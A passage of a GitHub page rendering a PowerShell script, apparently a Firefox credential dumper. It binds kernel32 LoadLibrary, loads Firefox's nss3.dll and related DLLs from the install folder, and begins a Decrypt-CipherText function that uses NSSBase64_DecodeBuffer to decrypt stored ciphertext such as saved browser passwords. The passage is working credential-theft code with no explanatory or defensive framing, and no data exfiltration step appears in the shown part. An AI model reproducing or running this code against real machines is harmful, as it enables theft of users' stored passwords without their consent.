class=\"pl-k\">,</span> <span class=\"pl-e\">[string]</span><span class=\"pl-k\">)</span> <span class=\"pl-k\">-</span>Charset Ansi <span class=\"pl-k\">-</span>SetLastError<span class=\"pl-k\">)</span><span class=\"pl-k\">,</span></td>\n      </tr>\n      <tr>\n        <td id=\"L764\" class=\"blob-num js-line-number\" data-line-number=\"764\"></td>\n        <td id=\"LC764\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">(</span>func kernel32 LoadLibrary <span class=\"pl-k\">(</span><span class=\"pl-e\">[IntPtr]</span><span class=\"pl-k\">)</span> <span class=\"pl-k\">@(</span><span class=\"pl-e\">[string]</span><span class=\"pl-k\">)</span> <span class=\"pl-k\">-</span>Charset Ansi <span class=\"pl-k\">-</span>SetLastError<span class=\"pl-k\">)</span><span class=\"pl-k\">,</span></td>\n      </tr>\n      <tr>\n        <td id=\"L765\" class=\"blob-num js-line-number\" data-line-number=\"765\"></td>\n        <td id=\"LC765\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">(</span>func kernel32 FreeLibrary <span class=\"pl-k\">(</span><span class=\"pl-e\">[Bool]</span><span class=\"pl-k\">)</span> <span class=\"pl-k\">@(</span><span class=\"pl-e\">[IntPtr]</span><span class=\"pl-k\">)</span> <span class=\"pl-k\">-</span>Charset Ansi <span class=\"pl-k\">-</span>SetLastError<span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L766\" class=\"blob-num js-line-number\" data-line-number=\"766\"></td>\n        <td id=\"LC766\" class=\"blob-code blob-code-inner js-file-line\">    <span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L767\" class=\"blob-num js-line-number\" data-line-number=\"767\"></td>\n        <td id=\"LC767\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L768\" class=\"blob-num js-line-number\" data-line-number=\"768\"></td>\n        <td id=\"LC768\" class=\"blob-code blob-code-inner js-file-line\">    <span class=\"pl-k\">$</span><span class=\"pl-smi\">TSECItem</span> <span class=\"pl-k\">=</span> struct <span class=\"pl-k\">$</span><span class=\"pl-smi\">Mod</span> TSECItem @{</td>\n      </tr>\n      <tr>\n        <td id=\"L769\" class=\"blob-num js-line-number\" data-line-number=\"769\"></td>\n        <td id=\"LC769\" class=\"blob-code blob-code-inner js-file-line\">        SECItemType    <span class=\"pl-k\">=</span>    field <span class=\"pl-c1\"><span class=\"pl-c1\">0</span></span> Int</td>\n      </tr>\n      <tr>\n        <td id=\"L770\" class=\"blob-num js-line-number\" data-line-number=\"770\"></td>\n        <td id=\"LC770\" class=\"blob-code blob-code-inner js-file-line\">        SECItemData    <span class=\"pl-k\">=</span>    field <span class=\"pl-c1\"><span class=\"pl-c1\">1</span></span> Int</td>\n      </tr>\n      <tr>\n        <td id=\"L771\" class=\"blob-num js-line-number\" data-line-number=\"771\"></td>\n        <td id=\"LC771\" class=\"blob-code blob-code-inner js-file-line\">        SECItemLen     <span class=\"pl-k\">=</span>    field <span class=\"pl-c1\"><span class=\"pl-c1\">2</span></span> Int</td>\n      </tr>\n      <tr>\n        <td id=\"L772\" class=\"blob-num js-line-number\" data-line-number=\"772\"></td>\n        <td id=\"LC772\" class=\"blob-code blob-code-inner js-file-line\">    }</td>\n      </tr>\n      <tr>\n        <td id=\"L773\" class=\"blob-num js-line-number\" data-line-number=\"773\"></td>\n        <td id=\"LC773\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L774\" class=\"blob-num js-line-number\" data-line-number=\"774\"></td>\n        <td id=\"LC774\" class=\"blob-code blob-code-inner js-file-line\">    <span class=\"pl-k\">$</span><span class=\"pl-smi\">Types</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">FunctionDefinitions</span> <span class=\"pl-k\">|</span> <span class=\"pl-c1\">Add-Win32Type</span> <span class=\"pl-k\">-</span>Module <span class=\"pl-k\">$</span><span class=\"pl-smi\">Mod</span> <span class=\"pl-k\">-</span>Namespace <span class=\"pl-s\">&#39;Win32&#39;</span></td>\n      </tr>\n      <tr>\n        <td id=\"L775\" class=\"blob-num js-line-number\" data-line-number=\"775\"></td>\n        <td id=\"LC775\" class=\"blob-code blob-code-inner js-file-line\">    <span class=\"pl-k\">$</span><span class=\"pl-smi\">Kernel32</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">Types</span><span class=\"pl-e\">[</span><span class=\"pl-s\">&#39;kernel32&#39;</span><span class=\"pl-e\">]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L776\" class=\"blob-num js-line-number\" data-line-number=\"776\"></td>\n        <td id=\"LC776\" class=\"blob-code blob-code-inner js-file-line\">    </td>\n      </tr>\n      <tr>\n        <td id=\"L777\" class=\"blob-num js-line-number\" data-line-number=\"777\"></td>\n        <td id=\"LC777\" class=\"blob-code blob-code-inner js-file-line\">    <span class=\"pl-k\">$</span><span class=\"pl-smi\">nssdllhandle</span> <span class=\"pl-k\">=</span> <span class=\"pl-e\">[IntPtr]</span>::Zero</td>\n      </tr>\n      <tr>\n        <td id=\"L778\" class=\"blob-num js-line-number\" data-line-number=\"778\"></td>\n        <td id=\"LC778\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L779\" class=\"blob-num js-line-number\" data-line-number=\"779\"></td>\n        <td id=\"LC779\" class=\"blob-code blob-code-inner js-file-line\">    <span class=\"pl-k\">if</span><span class=\"pl-k\">(</span><span class=\"pl-e\">[IntPtr]</span>::Size <span class=\"pl-k\">-eq</span> <span class=\"pl-c1\"><span class=\"pl-c1\">8</span></span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L780\" class=\"blob-num js-line-number\" data-line-number=\"780\"></td>\n        <td id=\"LC780\" class=\"blob-code blob-code-inner js-file-line\">    {</td>\n      </tr>\n      <tr>\n        <td id=\"L781\" class=\"blob-num js-line-number\" data-line-number=\"781\"></td>\n        <td id=\"LC781\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">Throw</span> <span class=\"pl-s\">&quot;Unable to load 32-bit dll&#39;s in 64-bit process.&quot;</span></td>\n      </tr>\n      <tr>\n        <td id=\"L782\" class=\"blob-num js-line-number\" data-line-number=\"782\"></td>\n        <td id=\"LC782\" class=\"blob-code blob-code-inner js-file-line\">    }</td>\n      </tr>\n      <tr>\n        <td id=\"L783\" class=\"blob-num js-line-number\" data-line-number=\"783\"></td>\n        <td id=\"LC783\" class=\"blob-code blob-code-inner js-file-line\">    <span class=\"pl-k\">$</span><span class=\"pl-smi\">mozillapath</span> <span class=\"pl-k\">=</span> <span class=\"pl-s\">&quot;C:\\Program Files (x86)\\Mozilla Firefox&quot;</span></td>\n      </tr>\n      <tr>\n        <td id=\"L784\" class=\"blob-num js-line-number\" data-line-number=\"784\"></td>\n        <td id=\"LC784\" class=\"blob-code blob-code-inner js-file-line\">    </td>\n      </tr>\n      <tr>\n        <td id=\"L785\" class=\"blob-num js-line-number\" data-line-number=\"785\"></td>\n        <td id=\"LC785\" class=\"blob-code blob-code-inner js-file-line\">    <span class=\"pl-k\">If</span><span class=\"pl-k\">(</span><span class=\"pl-c1\">Test-Path</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">mozillapath</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L786\" class=\"blob-num js-line-number\" data-line-number=\"786\"></td>\n        <td id=\"LC786\" class=\"blob-code blob-code-inner js-file-line\">    {</td>\n      </tr>\n      <tr>\n        <td id=\"L787\" class=\"blob-num js-line-number\" data-line-number=\"787\"></td>\n        <td id=\"LC787\" class=\"blob-code blob-code-inner js-file-line\">        </td>\n      </tr>\n      <tr>\n        <td id=\"L788\" class=\"blob-num js-line-number\" data-line-number=\"788\"></td>\n        <td id=\"LC788\" class=\"blob-code blob-code-inner js-file-line\">        </td>\n      </tr>\n      <tr>\n        <td id=\"L789\" class=\"blob-num js-line-number\" data-line-number=\"789\"></td>\n        <td id=\"LC789\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">$</span><span class=\"pl-smi\">nss3dll</span> <span class=\"pl-k\">=</span> <span class=\"pl-s\">&quot;<span class=\"pl-k\">$</span><span class=\"pl-smi\">mozillapath</span>\\nss3.dll&quot;</span></td>\n      </tr>\n      <tr>\n        <td id=\"L790\" class=\"blob-num js-line-number\" data-line-number=\"790\"></td>\n        <td id=\"LC790\" class=\"blob-code blob-code-inner js-file-line\">        </td>\n      </tr>\n      <tr>\n        <td id=\"L791\" class=\"blob-num js-line-number\" data-line-number=\"791\"></td>\n        <td id=\"LC791\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">$</span><span class=\"pl-smi\">mozgluedll</span> <span class=\"pl-k\">=</span> <span class=\"pl-s\">&quot;<span class=\"pl-k\">$</span><span class=\"pl-smi\">mozillapath</span>\\mozglue.dll&quot;</span></td>\n      </tr>\n      <tr>\n        <td id=\"L792\" class=\"blob-num js-line-number\" data-line-number=\"792\"></td>\n        <td id=\"LC792\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">$</span><span class=\"pl-smi\">msvcr120dll</span> <span class=\"pl-k\">=</span> <span class=\"pl-s\">&quot;<span class=\"pl-k\">$</span><span class=\"pl-smi\">mozillapath</span>\\msvcr120.dll&quot;</span></td>\n      </tr>\n      <tr>\n        <td id=\"L793\" class=\"blob-num js-line-number\" data-line-number=\"793\"></td>\n        <td id=\"LC793\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">$</span><span class=\"pl-smi\">msvcp120dll</span> <span class=\"pl-k\">=</span> <span class=\"pl-s\">&quot;<span class=\"pl-k\">$</span><span class=\"pl-smi\">mozillapath</span>\\msvcp120.dll&quot;</span></td>\n      </tr>\n      <tr>\n        <td id=\"L794\" class=\"blob-num js-line-number\" data-line-number=\"794\"></td>\n        <td id=\"LC794\" class=\"blob-code blob-code-inner js-file-line\">       </td>\n      </tr>\n      <tr>\n        <td id=\"L795\" class=\"blob-num js-line-number\" data-line-number=\"795\"></td>\n        <td id=\"LC795\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">if</span><span class=\"pl-k\">(</span><span class=\"pl-c1\">Test-Path</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">msvcr120dll</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L796\" class=\"blob-num js-line-number\" data-line-number=\"796\"></td>\n        <td id=\"LC796\" class=\"blob-code blob-code-inner js-file-line\">        {</td>\n      </tr>\n      <tr>\n        <td id=\"L797\" class=\"blob-num js-line-number\" data-line-number=\"797\"></td>\n        <td id=\"LC797\" class=\"blob-code blob-code-inner js-file-line\">         </td>\n      </tr>\n      <tr>\n        <td id=\"L798\" class=\"blob-num js-line-number\" data-line-number=\"798\"></td>\n        <td id=\"LC798\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">$</span><span class=\"pl-smi\">msvcr120dllHandle</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">Kernel32</span>::LoadLibrary<span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">msvcr120dll</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L799\" class=\"blob-num js-line-number\" data-line-number=\"799\"></td>\n        <td id=\"LC799\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">$</span><span class=\"pl-smi\">LastError</span><span class=\"pl-k\">=</span> <span class=\"pl-e\">[System.Runtime.InteropServices.Marshal]</span>::GetLastWin32Error<span class=\"pl-k\">()</span></td>\n      </tr>\n      <tr>\n        <td id=\"L800\" class=\"blob-num js-line-number\" data-line-number=\"800\"></td>\n        <td id=\"LC800\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-c1\">Write-Verbose</span> <span class=\"pl-s\">&quot;Last Error when loading mozglue.dll: <span class=\"pl-k\">$</span><span class=\"pl-smi\">LastError</span>&quot;</span></td>\n      </tr>\n      <tr>\n        <td id=\"L801\" class=\"blob-num js-line-number\" data-line-number=\"801\"></td>\n        <td id=\"LC801\" class=\"blob-code blob-code-inner js-file-line\">            </td>\n      </tr>\n      <tr>\n        <td id=\"L802\" class=\"blob-num js-line-number\" data-line-number=\"802\"></td>\n        <td id=\"LC802\" class=\"blob-code blob-code-inner js-file-line\">            </td>\n      </tr>\n      <tr>\n        <td id=\"L803\" class=\"blob-num js-line-number\" data-line-number=\"803\"></td>\n        <td id=\"LC803\" class=\"blob-code blob-code-inner js-file-line\">        }</td>\n      </tr>\n      <tr>\n        <td id=\"L804\" class=\"blob-num js-line-number\" data-line-number=\"804\"></td>\n        <td id=\"LC804\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L805\" class=\"blob-num js-line-number\" data-line-number=\"805\"></td>\n        <td id=\"LC805\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">if</span><span class=\"pl-k\">(</span><span class=\"pl-c1\">Test-Path</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">msvcp120dll</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L806\" class=\"blob-num js-line-number\" data-line-number=\"806\"></td>\n        <td id=\"LC806\" class=\"blob-code blob-code-inner js-file-line\">        {</td>\n      </tr>\n      <tr>\n        <td id=\"L807\" class=\"blob-num js-line-number\" data-line-number=\"807\"></td>\n        <td id=\"LC807\" class=\"blob-code blob-code-inner js-file-line\">       </td>\n      </tr>\n      <tr>\n        <td id=\"L808\" class=\"blob-num js-line-number\" data-line-number=\"808\"></td>\n        <td id=\"LC808\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">$</span><span class=\"pl-smi\">msvcp120dllHandle</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">kernel32</span>::LoadLibrary<span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">msvcp120dll</span><span class=\"pl-k\">)</span> </td>\n      </tr>\n      <tr>\n        <td id=\"L809\" class=\"blob-num js-line-number\" data-line-number=\"809\"></td>\n        <td id=\"LC809\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">$</span><span class=\"pl-smi\">LastError</span> <span class=\"pl-k\">=</span> <span class=\"pl-e\">[System.Runtime.InteropServices.Marshal]</span>::GetLastWin32Error<span class=\"pl-k\">()</span></td>\n      </tr>\n      <tr>\n        <td id=\"L810\" class=\"blob-num js-line-number\" data-line-number=\"810\"></td>\n        <td id=\"LC810\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-c1\">Write-Verbose</span> <span class=\"pl-s\">&quot;Last Error loading mscvp120.dll: <span class=\"pl-k\">$</span><span class=\"pl-smi\">LastError</span>&quot;</span> </td>\n      </tr>\n      <tr>\n        <td id=\"L811\" class=\"blob-num js-line-number\" data-line-number=\"811\"></td>\n        <td id=\"LC811\" class=\"blob-code blob-code-inner js-file-line\">            </td>\n      </tr>\n      <tr>\n        <td id=\"L812\" class=\"blob-num js-line-number\" data-line-number=\"812\"></td>\n        <td id=\"LC812\" class=\"blob-code blob-code-inner js-file-line\">        }</td>\n      </tr>\n      <tr>\n        <td id=\"L813\" class=\"blob-num js-line-number\" data-line-number=\"813\"></td>\n        <td id=\"LC813\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L814\" class=\"blob-num js-line-number\" data-line-number=\"814\"></td>\n        <td id=\"LC814\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">if</span><span class=\"pl-k\">(</span><span class=\"pl-c1\">Test-Path</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">mozgluedll</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L815\" class=\"blob-num js-line-number\" data-line-number=\"815\"></td>\n        <td id=\"LC815\" class=\"blob-code blob-code-inner js-file-line\">        {</td>\n      </tr>\n      <tr>\n        <td id=\"L816\" class=\"blob-num js-line-number\" data-line-number=\"816\"></td>\n        <td id=\"LC816\" class=\"blob-code blob-code-inner js-file-line\">            </td>\n      </tr>\n      <tr>\n        <td id=\"L817\" class=\"blob-num js-line-number\" data-line-number=\"817\"></td>\n        <td id=\"LC817\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">$</span><span class=\"pl-smi\">mozgluedllHandle</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">Kernel32</span>::LoadLibrary<span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">mozgluedll</span><span class=\"pl-k\">)</span> </td>\n      </tr>\n      <tr>\n        <td id=\"L818\" class=\"blob-num js-line-number\" data-line-number=\"818\"></td>\n        <td id=\"LC818\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">$</span><span class=\"pl-smi\">LastError</span> <span class=\"pl-k\">=</span> <span class=\"pl-e\">[System.Runtime.InteropServices.Marshal]</span>::GetLastWin32Error<span class=\"pl-k\">()</span></td>\n      </tr>\n      <tr>\n        <td id=\"L819\" class=\"blob-num js-line-number\" data-line-number=\"819\"></td>\n        <td id=\"LC819\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-c1\">Write-Verbose</span> <span class=\"pl-s\">&quot;Last error loading msvcr120.dll: <span class=\"pl-k\">$</span><span class=\"pl-smi\">LastError</span>&quot;</span></td>\n      </tr>\n      <tr>\n        <td id=\"L820\" class=\"blob-num js-line-number\" data-line-number=\"820\"></td>\n        <td id=\"LC820\" class=\"blob-code blob-code-inner js-file-line\">            </td>\n      </tr>\n      <tr>\n        <td id=\"L821\" class=\"blob-num js-line-number\" data-line-number=\"821\"></td>\n        <td id=\"LC821\" class=\"blob-code blob-code-inner js-file-line\">        }</td>\n      </tr>\n      <tr>\n        <td id=\"L822\" class=\"blob-num js-line-number\" data-line-number=\"822\"></td>\n        <td id=\"LC822\" class=\"blob-code blob-code-inner js-file-line\">        </td>\n      </tr>\n      <tr>\n        <td id=\"L823\" class=\"blob-num js-line-number\" data-line-number=\"823\"></td>\n        <td id=\"LC823\" class=\"blob-code blob-code-inner js-file-line\">        </td>\n      </tr>\n      <tr>\n        <td id=\"L824\" class=\"blob-num js-line-number\" data-line-number=\"824\"></td>\n        <td id=\"LC824\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">if</span><span class=\"pl-k\">(</span><span class=\"pl-c1\">Test-Path</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">nss3dll</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L825\" class=\"blob-num js-line-number\" data-line-number=\"825\"></td>\n        <td id=\"LC825\" class=\"blob-code blob-code-inner js-file-line\">        {</td>\n      </tr>\n      <tr>\n        <td id=\"L826\" class=\"blob-num js-line-number\" data-line-number=\"826\"></td>\n        <td id=\"LC826\" class=\"blob-code blob-code-inner js-file-line\">            </td>\n      </tr>\n      <tr>\n        <td id=\"L827\" class=\"blob-num js-line-number\" data-line-number=\"827\"></td>\n        <td id=\"LC827\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">$</span><span class=\"pl-smi\">nssdllhandle</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">Kernel32</span>::LoadLibrary<span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">nss3dll</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L828\" class=\"blob-num js-line-number\" data-line-number=\"828\"></td>\n        <td id=\"LC828\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-k\">$</span><span class=\"pl-smi\">LastError</span> <span class=\"pl-k\">=</span> <span class=\"pl-e\">[System.Runtime.InteropServices.Marshal]</span>::GetLastWin32Error<span class=\"pl-k\">()</span></td>\n      </tr>\n      <tr>\n        <td id=\"L829\" class=\"blob-num js-line-number\" data-line-number=\"829\"></td>\n        <td id=\"LC829\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-c1\">Write-Verbose</span> <span class=\"pl-s\">&quot;Last Error loading nss3.dll: <span class=\"pl-k\">$</span><span class=\"pl-smi\">LastError</span>&quot;</span>       </td>\n      </tr>\n      <tr>\n        <td id=\"L830\" class=\"blob-num js-line-number\" data-line-number=\"830\"></td>\n        <td id=\"LC830\" class=\"blob-code blob-code-inner js-file-line\">            </td>\n      </tr>\n      <tr>\n        <td id=\"L831\" class=\"blob-num js-line-number\" data-line-number=\"831\"></td>\n        <td id=\"LC831\" class=\"blob-code blob-code-inner js-file-line\">        }</td>\n      </tr>\n      <tr>\n        <td id=\"L832\" class=\"blob-num js-line-number\" data-line-number=\"832\"></td>\n        <td id=\"LC832\" class=\"blob-code blob-code-inner js-file-line\">    }</td>\n      </tr>\n      <tr>\n        <td id=\"L833\" class=\"blob-num js-line-number\" data-line-number=\"833\"></td>\n        <td id=\"LC833\" class=\"blob-code blob-code-inner js-file-line\">    </td>\n      </tr>\n      <tr>\n        <td id=\"L834\" class=\"blob-num js-line-number\" data-line-number=\"834\"></td>\n        <td id=\"LC834\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L835\" class=\"blob-num js-line-number\" data-line-number=\"835\"></td>\n        <td id=\"LC835\" class=\"blob-code blob-code-inner js-file-line\">    <span class=\"pl-k\">if</span><span class=\"pl-k\">(</span><span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">nssdllhandle</span> <span class=\"pl-k\">-eq</span> <span class=\"pl-c1\"><span class=\"pl-c1\">0</span></span><span class=\"pl-k\">)</span> <span class=\"pl-k\">-or</span> <span class=\"pl-k\">(</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">nssdllhandle</span> <span class=\"pl-k\">-eq</span> <span class=\"pl-e\">[IntPtr]</span>::Zero<span class=\"pl-k\">)</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L836\" class=\"blob-num js-line-number\" data-line-number=\"836\"></td>\n        <td id=\"LC836\" class=\"blob-code blob-code-inner js-file-line\">    {</td>\n      </tr>\n      <tr>\n        <td id=\"L837\" class=\"blob-num js-line-number\" data-line-number=\"837\"></td>\n        <td id=\"LC837\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-c1\">Write-Warning</span> <span class=\"pl-s\">&quot;Could not load nss3.dll&quot;</span></td>\n      </tr>\n      <tr>\n        <td id=\"L838\" class=\"blob-num js-line-number\" data-line-number=\"838\"></td>\n        <td id=\"LC838\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-c1\">Write-Verbose</span> <span class=\"pl-s\">&quot;Last Error: <span class=\"pl-k\">$(</span><span class=\"pl-e\">[System.Runtime.InteropServices.Marshal]</span>::GetLastWin32Error<span class=\"pl-k\">()</span><span class=\"pl-k\">)</span>&quot;</span></td>\n      </tr>\n      <tr>\n        <td id=\"L839\" class=\"blob-num js-line-number\" data-line-number=\"839\"></td>\n        <td id=\"LC839\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">break</span></td>\n      </tr>\n      <tr>\n        <td id=\"L840\" class=\"blob-num js-line-number\" data-line-number=\"840\"></td>\n        <td id=\"LC840\" class=\"blob-code blob-code-inner js-file-line\">    }</td>\n      </tr>\n      <tr>\n        <td id=\"L841\" class=\"blob-num js-line-number\" data-line-number=\"841\"></td>\n        <td id=\"LC841\" class=\"blob-code blob-code-inner js-file-line\">   </td>\n      </tr>\n      <tr>\n        <td id=\"L842\" class=\"blob-num js-line-number\" data-line-number=\"842\"></td>\n        <td id=\"LC842\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L843\" class=\"blob-num js-line-number\" data-line-number=\"843\"></td>\n        <td id=\"LC843\" class=\"blob-code blob-code-inner js-file-line\">    <span class=\"pl-k\">Function</span> <span class=\"pl-en\">Decrypt-CipherText</span></td>\n      </tr>\n      <tr>\n        <td id=\"L844\" class=\"blob-num js-line-number\" data-line-number=\"844\"></td>\n        <td id=\"LC844\" class=\"blob-code blob-code-inner js-file-line\">    {</td>\n      </tr>\n      <tr>\n        <td id=\"L845\" class=\"blob-num js-line-number\" data-line-number=\"845\"></td>\n        <td id=\"LC845\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">param</span></td>\n      </tr>\n      <tr>\n        <td id=\"L846\" class=\"blob-num js-line-number\" data-line-number=\"846\"></td>\n        <td id=\"LC846\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">(</span></td>\n      </tr>\n      <tr>\n        <td id=\"L847\" class=\"blob-num js-line-number\" data-line-number=\"847\"></td>\n        <td id=\"LC847\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-ent\">[paramete<span class=\"pl-ent\">r</span></span><span class=\"pl-e\">(<span class=\"pl-e\"><span class=\"pl-e\"><span class=\"pl-c1\">Mandatory</span>=<span class=\"pl-smi\">$True</span></span></span>)</span><span class=\"pl-ent\">]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L848\" class=\"blob-num js-line-number\" data-line-number=\"848\"></td>\n        <td id=\"LC848\" class=\"blob-code blob-code-inner js-file-line\">            <span class=\"pl-e\">[string]</span><span class=\"pl-k\">$</span><span class=\"pl-smi\">cipherText</span></td>\n      </tr>\n      <tr>\n        <td id=\"L849\" class=\"blob-num js-line-number\" data-line-number=\"849\"></td>\n        <td id=\"LC849\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L850\" class=\"blob-num js-line-number\" data-line-number=\"850\"></td>\n        <td id=\"LC850\" class=\"blob-code blob-code-inner js-file-line\">\n</td>\n      </tr>\n      <tr>\n        <td id=\"L851\" class=\"blob-num js-line-number\" data-line-number=\"851\"></td>\n        <td id=\"LC851\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-c\">#Cast the result from the Decode buffer function as a TSECItem struct and create an empty struct. Decrypt the cipher text and then</span></td>\n      </tr>\n      <tr>\n        <td id=\"L852\" class=\"blob-num js-line-number\" data-line-number=\"852\"></td>\n        <td id=\"LC852\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-c\">#store it inside the empty struct.</span></td>\n      </tr>\n      <tr>\n        <td id=\"L853\" class=\"blob-num js-line-number\" data-line-number=\"853\"></td>\n        <td id=\"LC853\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">$</span><span class=\"pl-smi\">Result</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">NSSBase64_DecodeBuffer</span><span class=\"pl-en\">.Invoke</span><span class=\"pl-k\">(</span><span class=\"pl-e\">[IntPtr]</span>::Zero<span class=\"pl-k\">,</span> <span class=\"pl-e\">[IntPtr]</span>::Zero<span class=\"pl-k\">,</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">cipherText</span><span class=\"pl-k\">,</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">cipherText</span><span class=\"pl-en\">.Length</span><span class=\"pl-k\">)</span></td>\n      </tr>\n      <tr>\n        <td id=\"L854\" class=\"blob-num js-line-number\" data-line-number=\"854\"></td>\n        <td id=\"LC854\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-c1\">Write-Verbose</span> <span class=\"pl-s\">&quot;[+]NSSBase64_DecodeBuffer Result: <span class=\"pl-k\">$</span><span class=\"pl-smi\">Result</span>&quot;</span></td>\n      </tr>\n      <tr>\n        <td id=\"L855\" class=\"blob-num js-line-number\" data-line-number=\"855\"></td>\n        <td id=\"LC855\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">$</span><span class=\"pl-smi\">ResultPtr</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">Result</span> <span class=\"pl-k\">-as</span> <span class=\"pl-e\">[IntPtr]</span></td>\n      </tr>\n      <tr>\n        <td id=\"L856\" class=\"blob-num js-line-number\" data-line-number=\"856\"></td>\n        <td id=\"LC856\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">$</span><span class=\"pl-smi\">offset</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">ResultPtr</span><span class=\"pl-en\">.ToInt64</span><span class=\"pl-k\">()</span></td>\n      </tr>\n      <tr>\n        <td id=\"L857\" class=\"blob-num js-line-number\" data-line-number=\"857\"></td>\n        <td id=\"LC857\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">$</span><span class=\"pl-smi\">newptr</span> <span class=\"pl-k\">=</span> <span class=\"pl-c1\">New-Object</span> System.IntPtr <span class=\"pl-k\">-</span>ArgumentList <span class=\"pl-k\">$</span><span class=\"pl-smi\">offset</span></td>\n      </tr>\n      <tr>\n        <td id=\"L858\" class=\"blob-num js-line-number\" data-line-number=\"858\"></td>\n        <td id=\"LC858\" class=\"blob-code blob-code-inner js-file-line\">        <span class=\"pl-k\">$</span><span class=\"pl-smi\">TSECStructData</span> <span class=\"pl-k\">=</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">newptr</span> <span class=\"pl-k\">-as</span> <span class=\"pl-k\">$</span><span class=\"pl-smi\">TSECItem</span></td>\n      </tr>\n      <tr>\n        <td id=\"L859\" class=\"blob-num js-line-number\" 